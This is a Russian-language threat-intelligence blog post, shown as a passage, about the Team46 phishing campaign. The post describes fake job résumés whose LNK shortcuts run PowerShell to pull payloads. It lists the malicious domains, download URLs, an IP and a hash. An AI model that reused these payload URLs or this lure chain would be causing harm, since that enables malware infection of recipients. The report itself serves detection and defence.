{"id":431359,"date":"2024-09-05T21:00:29","date_gmt":"2024-09-05T21:00:29","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=431359"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=431359","title":{"rendered":"<span>\u0410\u0442\u0430\u043a\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Team46<\/span>"},"content":{"rendered":"<div><!--[--><!--]--><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w780q1\/getpro\/habr\/upload_files\/ce2\/3ee\/b1c\/ce23eeb1c7d51125d7c985b5dffbec03.jpg\" width=\"1000\" height=\"750\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/ce2\/3ee\/b1c\/ce23eeb1c7d51125d7c985b5dffbec03.jpg\" data-blurred=\"true\"\/><\/figure>\n<p>\u0427\u0435\u0442\u0432\u0435\u0440\u0442\u043e\u0433\u043e \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u00ab\u0414\u043e\u043a\u0442\u043e\u0440 \u0412\u0435\u0431\u00bb \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 <a href=\"https:\/\/news.drweb.ru\/show\/?i=14899&amp;c=5&amp;lng=ru\">\u043e\u0442\u0447\u0435\u0442<\/a> \u043e \u043d\u0435\u0441\u043e\u0441\u0442\u043e\u044f\u0432\u0448\u0435\u0439\u0441\u044f \u0430\u0442\u0430\u043a\u0435 \u043d\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0433\u043e \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u0430 \u0433\u0440\u0443\u0437\u043e\u0432\u044b\u0445 \u0436.\/\u0434. \u043f\u0435\u0440\u0435\u0432\u043e\u0437\u043e\u043a. <\/p>\n<p>\u041d\u0430\u043c \u0445\u043e\u0442\u0435\u043b\u043e\u0441\u044c \u0431\u044b \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432 \u044d\u0442\u043e\u0442 \u043e\u0442\u0447\u0435\u0442 \u043d\u0430\u0448\u0438 \u043d\u0430\u0445\u043e\u0434\u043a\u0438 \u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0434\u0440\u0443\u0433\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445. \u041c\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 \u0433\u0440\u0443\u043f\u043f\u0443 Team46, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0432 \u0441\u0432\u043e\u0435\u0439 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0434\u043e\u043c\u0435\u043d <code>cybers46.team<\/code>.<\/p>\n<h2>\u041f\u0435\u0440\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430<\/h2>\n<p>\u0412 \u043a\u043e\u043d\u0446\u0435 \u0444\u0435\u0432\u0440\u0430\u043b\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 <a href=\"https:\/\/t.me\/ptescalator\">Threat Intelligence \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043d\u043e\u0433\u043e \u0446\u0435\u043d\u0442\u0440\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Positive Technologies<\/a> \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043f\u0438\u0441\u044c\u043c\u043e \u0441 \u0442\u0435\u043c\u043e\u0439 <code>Re: \u0424\u0440\u043e\u043d\u0442\u0435\u043d\u0434-\u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a<\/code>. \u041e\u043d\u043e \u0431\u044b\u043b\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0441 \u0430\u0434\u0440\u0435\u0441\u0430 <code>jobs@rabotnik.today<\/code> \u0438 \u0437\u0430\u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u043f\u043e\u0434 \u0440\u0435\u0437\u044e\u043c\u0435 \u0444\u0440\u043e\u043d\u0442\u0435\u043d\u0434-\u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f01\/0ec\/284\/f010ec284549ab5ed706c585f4c7ee9e.png\" width=\"1592\" height=\"895\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/f01\/0ec\/284\/f010ec284549ab5ed706c585f4c7ee9e.png\"\/><\/figure>\n<p>\u0421\u0440\u0430\u0437\u0443 \u0431\u0440\u043e\u0441\u0430\u0435\u0442\u0441\u044f \u0432 \u0433\u043b\u0430\u0437\u0430 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430\u0443\u0433\u0430\u0434 \u043d\u043e\u043c\u0435\u0440 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430 \u0432 \u043f\u043e\u0434\u043f\u0438\u0441\u0438. \u041a \u043f\u0438\u0441\u044c\u043c\u0443 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d \u0437\u0430\u043f\u0430\u0440\u043e\u043b\u0435\u043d\u043d\u044b\u0439 \u0430\u0440\u0445\u0438\u0432 <code>Job Application_20240268.rar<\/code>, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0444\u0430\u0439\u043b <code>Job Application.pdf.lnk<\/code>, \u043f\u0430\u0440\u043e\u043b\u044c \u043e\u0442 \u0430\u0440\u0445\u0438\u0432\u0430 (\u0418\u043d\u043d\u0430) \u0443\u043a\u0430\u0437\u0430\u043d \u0432 \u0442\u0435\u043a\u0441\u0442\u0435 \u043f\u0438\u0441\u044c\u043c\u0430. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0432 \u043f\u0438\u0441\u044c\u043c\u0435 \u0435\u0441\u0442\u044c \u0441\u0441\u044b\u043b\u043a\u0430 <code>rabotnik.today\/resume\/7952235986937661.rar<\/code>, \u043f\u043e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0430\u0440\u0445\u0438\u0432 \u0443\u0436\u0435 \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0442\u043e\u0442 \u0436\u0435 \u0441\u0430\u043c\u044b\u0439 \u044f\u0440\u043b\u044b\u043a. \u0418\u0437 \u044f\u0440\u043b\u044b\u043a\u0430 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f PowerShell-\u0441\u043a\u0440\u0438\u043f\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0434\u0440\u0443\u0433\u043e\u0439 PowerShell-\u0441\u043a\u0440\u0438\u043f\u0442 \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 <code>infosecteam.info\/other.php?id=jdcz7vyqdoadr31gejeivo6g30cx7kgu (c5578c44bb56edc97c0ee974a90912716217c39449649be6755ba9417ecb7e73)<\/code>, \u0430 \u0442\u043e\u0442 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0443 \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 <code>infosecteam.info\/Job%20application.pdf<\/code> \u0438 \u043e\u0441\u043d\u043e\u0432\u043d\u0443\u044e \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 <code>infosecteam.info\/base.php<\/code>, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043d\u0430\u043c \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c, \u043d\u043e \u043e\u043d\u0430 \u0431\u044b\u043b\u0430 \u043e\u043f\u0438\u0441\u0430\u043d\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438 \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u00ab\u0414\u043e\u043a\u0442\u043e\u0440 \u0412\u0435\u0431\u00bb.<\/p>\n<p>\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0430 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u0440\u0435\u0437\u044e\u043c\u0435 \u043d\u0435\u043a\u043e\u0439 \u041a\u043b\u0435\u0431\u043b\u0435\u0446 \u0418\u043d\u043d\u044b \u0424\u0435\u0434\u043e\u0440\u043e\u0432\u043d\u044b. <\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/8db\/533\/04e\/8db53304e30f5a14a5bb587367f5e326.png\" width=\"794\" height=\"1123\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/8db\/533\/04e\/8db53304e30f5a14a5bb587367f5e326.png\"\/><\/figure>\n<p>\u0420\u0435\u0437\u044e\u043c\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0444\u0430\u043a\u0442\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043e\u0448\u0438\u0431\u043e\u043a. \u041f\u0438\u0441\u044c\u043c\u043e \u0431\u044b\u043b\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0432 \u043a\u043e\u043d\u0446\u0435 \u0444\u0435\u0432\u0440\u0430\u043b\u044f 2024 \u0433\u043e\u0434\u0430, \u0430 \u0434\u0430\u0442\u0430 \u0440\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u2014 10 \u043c\u0430\u0440\u0442\u0430 1994 \u0433\u043e\u0434\u0430, \u0442\u043e \u0435\u0441\u0442\u044c \u0434\u043e\u043b\u0436\u043d\u043e \u0431\u044b\u0442\u044c \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043e 29 \u043b\u0435\u0442, \u0430 \u043d\u0435 30. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0444\u0430\u043c\u0438\u043b\u0438\u0438 \u041a\u043b\u0435\u0431\u043b\u0435\u0446 <span class=\"habrahidden\">\u043d\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0435<\/span>.<\/p>\n<p>\u0418\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0432 \u0440\u0435\u0437\u044e\u043c\u0435 \u0431\u044b\u043b \u0443\u043a\u0430\u0437\u0430\u043d \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0430\u0434\u0440\u0435\u0441 <code>8067282501@mail.ru<\/code>, \u0430 \u043f\u043e\u0441\u043b\u0435 \u0438\u0437\u043c\u0435\u043d\u0435\u043d \u043d\u0430 <code>inna.kleblets@mail.ru<\/code>. \u0412\u0441\u0435 \u044d\u0442\u043e, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0444\u0430\u0439\u043b \u0431\u044b\u043b \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d \u0441 \u0441\u0430\u0439\u0442\u0430 hh.ru \u0438 \u043e\u0442\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d \u0432 LibreOffice Writer 7.3 7 \u0444\u0435\u0432\u0440\u0430\u043b\u044f 2024 \u0432 02:00:00 UTC-05:00, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u044f\u0437\u044b\u043a\u0430 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 LibreOffice Writer \u0431\u044b\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d en-US.<\/p>\n<p>\u041e\u0442\u043b\u0438\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c\u044e \u044d\u0442\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0442\u043e, \u0447\u0442\u043e \u0432\u0441\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0435 \u0434\u043e\u043c\u0435\u043d\u044b \u0438\u043c\u0435\u044e\u0442 \u0437\u0430\u0433\u043b\u0443\u0448\u043a\u0438, \u0441\u043e\u0437\u0434\u0430\u044e\u0449\u0438\u0435 \u0432\u0438\u0434 \u0435\u0433\u043e \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0441\u0442\u0438. \u0422\u0430\u043a, \u0434\u043e\u043c\u0435\u043d <code>infosecteam.info<\/code> \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0438\u0442 \u044f\u043a\u043e\u0431\u044b \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 InfoSecTeam. <\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2a5\/583\/0cf\/2a55830cf065b09595cfa61251b520fe.png\" width=\"1614\" height=\"807\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/2a5\/583\/0cf\/2a55830cf065b09595cfa61251b520fe.png\"\/><\/figure>\n<p>\u042d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0444\u0430\u0439\u043b \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0435 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u043e\u0439, \u0430 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u043e\u043c. \u0421\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u0441\u0430\u0439\u0442\u0430 \u044f\u0432\u043d\u043e \u0438\u043c\u0435\u044e\u0442 \u043c\u0430\u0448\u0438\u043d\u043d\u044b\u0439 \u043f\u0435\u0440\u0435\u0432\u043e\u0434. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0432 \u0444\u0443\u0442\u0435\u0440\u0435 \u0441\u0430\u0439\u0442\u0430 \u0435\u0441\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0430 \u0432 \u0430\u0434\u0440\u0435\u0441\u0435, \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0443\u043a\u0430\u0437\u0430\u043d\u0438\u0435 \u0434\u043e\u043c\u0430.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/eca\/b01\/4b5\/ecab014b54e40757ccae4d57dd6fcacc.png\" width=\"1801\" height=\"681\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/eca\/b01\/4b5\/ecab014b54e40757ccae4d57dd6fcacc.png\"\/><\/figure>\n<p>\u0428\u0430\u0431\u043b\u043e\u043d \u0441\u0430\u0439\u0442\u0430 \u0432\u0437\u044f\u0442 \u0438\u0437 \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 \u0448\u0430\u0431\u043b\u043e\u043d\u043e\u0432 \u0434\u043b\u044f WordPress.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/862\/2a6\/ea0\/8622a6ea0117157aa431992e41a4b1de.png\" width=\"1797\" height=\"770\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/862\/2a6\/ea0\/8622a6ea0117157aa431992e41a4b1de.png\"\/><\/figure>\n<p>\u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u0447\u0442\u043e \u043f\u0440\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u043f\u043e\u0438\u0441\u043a\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0432 Google \u043f\u0435\u0440\u0432\u044b\u0435 \u0434\u0432\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u0430\u0439\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0430 \u0440\u0435\u0430\u043b\u044c\u043d\u0430\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0438\u0437 \u0412\u0435\u043b\u0438\u043a\u043e\u0431\u0440\u0438\u0442\u0430\u043d\u0438\u0438, \u0438\u043c\u0435\u044e\u0449\u0430\u044f \u0442\u043e \u0436\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435, \u2014 \u043b\u0438\u0448\u044c \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u0443\u044e.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d33\/529\/4df\/d335294dff1f902c23ba8923dff0b045.png\" width=\"1920\" height=\"1080\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/d33\/529\/4df\/d335294dff1f902c23ba8923dff0b045.png\"\/><\/figure>\n<p>\u0410\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u0430\u044f \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u0442\u0441\u044f \u0438 \u043f\u0440\u0438 \u043f\u043e\u0438\u0441\u043a\u0435 \u0432 \u042f\u043d\u0434\u0435\u043a\u0441\u0435.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/bf9\/59a\/4ce\/bf959a4cebbfabb65e7a7eac7203d4c6.png\" width=\"1012\" height=\"697\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/bf9\/59a\/4ce\/bf959a4cebbfabb65e7a7eac7203d4c6.png\"\/><\/figure>\n<p>\u0414\u043e\u043c\u0435\u043d <code>rabotnik.today<\/code> \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u0437\u0430\u0433\u043b\u0443\u0448\u043a\u0443.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/514\/1a6\/867\/5141a6867d1a0cf1f46f125dba4e3f6c.png\" width=\"1801\" height=\"779\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/514\/1a6\/867\/5141a6867d1a0cf1f46f125dba4e3f6c.png\"\/><\/figure>\n<p>\u0423 \u0441\u0430\u0439\u0442\u0430 \u0435\u0441\u0442\u044c \u0440\u0443\u0441\u0441\u043a\u043e\u044f\u0437\u044b\u0447\u043d\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043c\u0430\u0448\u0438\u043d\u043d\u044b\u0439 \u043f\u0435\u0440\u0435\u0432\u043e\u0434.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/973\/a63\/437\/973a634379362d35f00c058589561c9f.png\" width=\"1801\" height=\"779\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/973\/a63\/437\/973a634379362d35f00c058589561c9f.png\"\/><\/figure>\n<p>\u0412 \u0430\u0442\u0430\u043a\u0435 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u044b \u0434\u0432\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 \u2014 <code>rabotnik.today<\/code> \u0438 <code>infosecteam.info<\/code>, \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 08.12.2023 \u0438 19.02.2024 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e. \u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e, \u0431\u044b\u043b\u0438 \u043d\u0430\u0439\u0434\u0435\u043d\u044b \u0435\u0449\u0435 \u0434\u0432\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 \u2014 <code>cybers46.team<\/code> \u0438 <code>cybers4646.my.id<\/code>, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b 05.06.2023 \u0438 03.06.2023 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0438 \u0442\u0430\u043a \u0436\u0435 \u0440\u0435\u0437\u043e\u043b\u0432\u0438\u043b\u0438\u0441\u044c \u0432 162.0.236.151, \u043a\u0430\u043a \u0438 <code>infosecteam.info<\/code>. \u041f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u043e\u043d\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0434\u043b\u044f \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u0430\u0442\u0430\u043a\u0438, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u0430 \u0430\u0442\u0430\u043a\u0430 \u043d\u0435 \u043f\u0435\u0440\u0432\u0430\u044f. \u041f\u043e \u0434\u043e\u043c\u0435\u043d\u0443 <code>cybers46.team<\/code> \u043c\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0443\u044e \u0433\u0440\u0443\u043f\u043f\u0443 Team46.<\/p>\n<p>\u0421\u0430\u043c\u0430 \u0430\u0442\u0430\u043a\u0430 \u043d\u043e\u0441\u0438\u043b\u0430 \u044f\u0432\u043d\u043e \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440: \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043f\u043e\u0447\u0442\u0438 4000 \u043e\u0434\u0438\u043d\u0430\u043a\u043e\u0432\u044b\u0445 \u044f\u0440\u043b\u044b\u043a\u043e\u0432 (\u043d\u043e \u0441 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430\u043c\u0438 \u0436\u0435\u0440\u0442\u0432) \u0432 \u0430\u0440\u0445\u0438\u0432\u0430\u0445 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 \u043f\u0430\u043f\u043a\u0430\u0445 \u043d\u0430 <code>infosecteam.info<\/code>, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0442\u0443\u0434\u0430 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0442\u0440\u0435\u0445 \u043c\u0438\u043d\u0443\u0442.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cb2\/db2\/467\/cb2db2467aa815e487cfaba7d95011fa.png\" width=\"635\" height=\"781\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/cb2\/db2\/467\/cb2db2467aa815e487cfaba7d95011fa.png\"\/><\/figure>\n<p>\u041f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0438 \u043f\u0440\u0438 \u043f\u043e\u0438\u0441\u043a\u0435 \u0432 \u042f\u043d\u0434\u0435\u043a\u0441\u0435 \u0442\u043e\u0436\u0435 \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043b\u044e\u0434\u0438 \u0447\u0430\u0441\u0442\u043e \u0441\u0442\u0430\u043b\u043a\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u0441 \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u043c \u0444\u0435\u0439\u043a\u043e\u0432\u044b\u043c \u0440\u0435\u0437\u044e\u043c\u0435.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/af7\/21e\/1d7\/af721e1d7ec67cc7aad62d75f108c74c.png\" width=\"943\" height=\"245\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/af7\/21e\/1d7\/af721e1d7ec67cc7aad62d75f108c74c.png\"\/><\/figure>\n<h2>\u0412\u0442\u043e\u0440\u0430\u044f \u0430\u0442\u0430\u043a\u0430<\/h2>\n<p>\u0412 \u0430\u043f\u0440\u0435\u043b\u0435 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u0430\u043c\u0438 PT Expert Security Center \u0442\u0430\u043a\u0436\u0435 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044f\u0440\u043b\u044b\u043a\u0438 \u0441 \u0438\u043c\u0435\u043d\u0430\u043c\u0438 <code>SCAN_4024_2024_04_02.pdf.lnk<\/code> \u0438 <code>SCAN_4251_2024_03_25.pdf.lnk<\/code>, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0432\u0448\u0438\u0435 \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 <code>srv480138.hstgr.cloud\/uploads\/scan_3824.pdf<\/code> \u0434\u0440\u0443\u0433\u043e\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0443.    <\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/dec\/76f\/dc8\/dec76fdc82c97a1e252aaac80d89dab2.png\" width=\"794\" height=\"1123\" 